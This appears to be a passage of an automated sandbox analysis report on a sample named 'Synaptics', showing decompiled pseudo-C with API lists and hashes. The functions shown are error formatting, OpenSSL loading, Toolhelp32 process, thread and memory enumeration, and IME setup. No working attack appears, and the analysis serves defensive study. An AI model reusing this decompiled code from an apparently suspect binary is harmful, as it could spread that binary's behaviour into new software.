                                                                                                                                                                                          0x00458ee0
                                                                                                                                                                                          0x00458edc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00458ebf
                                                                                                                                                                                          0x00458efd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00458EB0
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00458ECD
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00458EED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1359611202-0
                                                                                                                                                                                          • Opcode ID: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                                                                                                                                                          • Instruction ID: 5466cc4fe75e799d867a24ddfff030feada42c46f86c6fe88e2ad44c126da2fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F054315082049BDB14EB5AD887B5633A8EB14316F50017FE911E62D2DF7EA849C61E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00425FB8 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00425FB8(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x426054);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00425F64(_t22);
				} else {
					E00404C30( &_v264, 0x100,  &_v260);
					E0040D144(_v264, 1);
					E00404378();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x42605b);
				return E004049C0( &_v264);
			}









                                                                                                                                                                                          0x00425fc4
                                                                                                                                                                                          0x00425fcc
                                                                                                                                                                                          0x00425fcd
                                                                                                                                                                                          0x00425fd2
                                                                                                                                                                                          0x00425fd5
                                                                                                                                                                                          0x00425fdd
                                                                                                                                                                                          0x00425fe1
                                                                                                                                                                                          0x00426036
                                                                                                                                                                                          0x00426007
                                                                                                                                                                                          0x00426018
                                                                                                                                                                                          0x0042602a
                                                                                                                                                                                          0x0042602f
                                                                                                                                                                                          0x0042602f
                                                                                                                                                                                          0x0042603d
                                                                                                                                                                                          0x00426040
                                                                                                                                                                                          0x00426043
                                                                                                                                                                                          0x00426053

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00426054), ref: 00425FD8
                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426054), ref: 00425FFE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                          • Opcode ID: f0d91c9006d97edc8eaac6ec30f924743f751d99d366baf70ec74655a5f3c977
                                                                                                                                                                                          • Instruction ID: ab31158e8105cc555809865ed5eec4947da01a74a5557fb65747f91f9d9dccb4
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0d91c9006d97edc8eaac6ec30f924743f751d99d366baf70ec74655a5f3c977
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901FCB07043155BE731EB619D92BD6739CE758744F9200BBB744A61C1DBF86D40891D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004906B8 Relevance: 142.1, APIs: 2, Strings: 79, Instructions: 395libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004906B8() {
				void* __ebx;
				void* _t158;

				_t158 = 1;
				if( *0x49d588 == 0) {
					 *0x49d588 = LoadLibraryA("libeay32.dll");
				}
				_t160 =  *0x49d584;
				if( *0x49d584 == 0) {
					 *0x49d584 = LoadLibraryA("ssleay32.dll");
					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
					 *0x49d490 = E0049058C("SSL_new", _t158);
					 *0x49d494 = E0049058C("SSL_free", _t158);
					 *0x49d498 = E0049058C("SSL_accept", _t158);
					 *0x49d49c = E0049058C("SSL_connect", _t158);
					 *0x49d4a0 = E0049058C("SSL_read", _t158);
					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
					 *0x49d4a8 = E0049058C("SSL_write", _t158);
					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
					 *0x49d52c = E0049058C("X509_digest", _t158);
					 *0x49d530 = E0049058C("EVP_md5", _t158);
					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
					 *0x49d590 = E00490648("RAND_screen", _t158);
					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
					 *0x49d550 = E00490648("des_set_key", _t158);
					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
						_t158 = 0;
					} else {
						_t158 = 1;
					}
				}
				return _t158;
			}





                                                                                                                                                                                          0x004906b9
                                                                                                                                                                                          0x004906c2
                                                                                                                                                                                          0x004906ce
                                                                                                                                                                                          0x004906ce
                                                                                                                                                                                          0x004906d3
                                                                                                                                                                                          0x004906da
                                                                                                                                                                                          0x004906ea
                                                                                                                                                                                          0x004906f9
                                                                                                                                                                                          0x00490708
                                                                                                                                                                                          0x00490717
                                                                                                                                                                                          0x00490726
                                                                                                                                                                                          0x00490735
                                                                                                                                                                                          0x00490744
                                                                                                                                                                                          0x00490753
                                                                                                                                                                                          0x00490762
                                                                                                                                                                                          0x00490771
                                                                                                                                                                                          0x00490780
                                                                                                                                                                                          0x0049078f
                                                                                                                                                                                          0x0049079e
                                                                                                                                                                                          0x004907ad
                                                                                                                                                                                          0x004907bc
                                                                                                                                                                                          0x004907cb
                                                                                                                                                                                          0x004907da
                                                                                                                                                                                          0x004907e9
                                                                                                                                                                                          0x004907f8
                                                                                                                                                                                          0x00490807
                                                                                                                                                                                          0x00490816
                                                                                                                                                                                          0x00490825
                                                                                                                                                                                          0x00490834
                                                                                                                                                                                          0x00490843
                                                                                                                                                                                          0x00490852
                                                                                                                                                                                          0x00490861
                                                                                                                                                                                          0x00490870
                                                                                                                                                                                          0x0049087f
                                                                                                                                                                                          0x0049088e
                                                                                                                                                                                          0x0049089d
                                                                                                                                                                                          0x004908ac
                                                                                                                                                                                          0x004908bb
                                                                                                                                                                                          0x004908ca
                                                                                                                                                                                          0x004908d9
                                                                                                                                                                                          0x004908e8
                                                                                                                                                                                          0x004908f7
                                                                                                                                                                                          0x00490906
                                                                                                                                                                                          0x00490915
                                                                                                                                                                                          0x00490924
                                                                                                                                                                                          0x00490933
                                                                                                                                                                                          0x00490942
                                                                                                                                                                                          0x00490951
                                                                                                                                                                                          0x00490960
                                                                                                                                                                                          0x0049096f
                                                                                                                                                                                          0x0049097e
                                                                                                                                                                                          0x0049098d
                                                                                                                                                                                          0x0049099c
                                                                                                                                                                                          0x004909ab
                                                                                                                                                                                          0x004909ba
                                                                                                                                                                                          0x004909c9
                                                                                                                                                                                          0x004909d8
                                                                                                                                                                                          0x004909e7
                                                                                                                                                                                          0x004909f6
                                                                                                                                                                                          0x00490a05
                                                                                                                                                                                          0x00490a14
                                                                                                                                                                                          0x00490a23
                                                                                                                                                                                          0x00490a32
                                                                                                                                                                                          0x00490a41
                                                                                                                                                                                          0x00490a50
                                                                                                                                                                                          0x00490a5f
                                                                                                                                                                                          0x00490a6e
                                                                                                                                                                                          0x00490a7d
                                                                                                                                                                                          0x00490a8c
                                                                                                                                                                                          0x00490a9b
                                                                                                                                                                                          0x00490aaa
                                                                                                                                                                                          0x00490ab9
                                                                                                                                                                                          0x00490ac8
                                                                                                                                                                                          0x00490ad7
                                                                                                                                                                                          0x00490ae6
                                                                                                                                                                                          0x00490af5
                                                                                                                                                                                          0x00490b04
                                                                                                                                                                                          0x00490b13
                                                                                                                                                                                          0x00490b22
                                                                                                                                                                                          0x00490b31
                                                                                                                                                                                          0x00490b40
                                                                                                                                                                                          0x00490b4f
                                                                                                                                                                                          0x00490b5e
                                                                                                                                                                                          0x00490b6d
                                                                                                                                                                                          0x00490b79
                                                                                                                                                                                          0x00490eeb
                                                                                                                                                                                          0x00490eef
                                                                                                                                                                                          0x00490eef
                                                                                                                                                                                          0x00490eef
                                                                                                                                                                                          0x00490b79
                                                                                                                                                                                          0x00490ef4

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                                                                                                                                                            • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                                                                                                                                                            • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                                                                                                                                                          • API String ID: 2574300362-3914122982
                                                                                                                                                                                          • Opcode ID: 31a3a092b2a30d0d7f1c1506beb22041e5308534041b8679323eb52cb0d8e883
                                                                                                                                                                                          • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31a3a092b2a30d0d7f1c1506beb22041e5308534041b8679323eb52cb0d8e883
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004728A4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004728A4() {

				if( *0x49ebf4 == 0) {
					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
					if( *0x49ebf4 != 0) {
						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
					}
				}
				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                                                                                                                                                          0x004728ad
                                                                                                                                                                                          0x004728bd
                                                                                                                                                                                          0x004728c2
                                                                                                                                                                                          0x004728d5
                                                                                                                                                                                          0x004728e7
                                                                                                                                                                                          0x004728f9
                                                                                                                                                                                          0x0047290b
                                                                                                                                                                                          0x0047291d
                                                                                                                                                                                          0x0047292f
                                                                                                                                                                                          0x00472941
                                                                                                                                                                                          0x00472953
                                                                                                                                                                                          0x00472965
                                                                                                                                                                                          0x00472977
                                                                                                                                                                                          0x00472989
                                                                                                                                                                                          0x0047299b
                                                                                                                                                                                          0x004729ad
                                                                                                                                                                                          0x004729bf
                                                                                                                                                                                          0x004729d1
                                                                                                                                                                                          0x004729e3
                                                                                                                                                                                          0x004729e3
                                                                                                                                                                                          0x004728c2
                                                                                                                                                                                          0x004729eb
                                                                                                                                                                                          0x004729f9
                                                                                                                                                                                          0x004729fa
                                                                                                                                                                                          0x004729fd
                                                                                                                                                                                          0x004729fd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,00000000,022B2354,00475AEA,00000000,00475BD5,?,00000000,022B2354,?,0049A4F9,001F0001,00000000,00000000), ref: 004728B8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                                          • Opcode ID: c24cc2f4e29e7164c5864ba41ede5b50f237ada6fc0e9d221cefe5e484333100
                                                                                                                                                                                          • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                                                                                                                                                          • Opcode Fuzzy Hash: c24cc2f4e29e7164c5864ba41ede5b50f237ada6fc0e9d221cefe5e484333100
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00445F34 Relevance: 50.8, APIs: 15, Strings: 14, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00445F34() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x49de44; // 0x49e744
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x44609a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x49eb6c == 0) {
						 *0x49eb6c = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x49bd4c == 0) {
						 *0x49bd4c = LoadLibraryA("imm32.dll");
						if( *0x49bd4c != 0) {
							_t11 =  *0x49bd4c; // 0x0
							 *0x49eb70 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x49bd4c; // 0x0
							 *0x49eb74 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x49bd4c; // 0x0
							 *0x49eb78 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x49bd4c; // 0x0
							 *0x49eb7c = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x49bd4c; // 0x0
							 *0x49eb80 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x49bd4c; // 0x0
							 *0x49eb84 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x49bd4c; // 0x0
							 *0x49eb88 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x49bd4c; // 0x0
							 *0x49eb8c = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x49bd4c; // 0x0
							 *0x49eb90 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x49bd4c; // 0x0
							 *0x49eb94 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x4460a1);
					return SetErrorMode(_v8);
				}
			}


















                                                                                                                                                                                          0x00445f35
                                                                                                                                                                                          0x00445f39
                                                                                                                                                                                          0x00445f42
                                                                                                                                                                                          0x004460a4
                                                                                                                                                                                          0x00445f48
                                                                                                                                                                                          0x00445f52
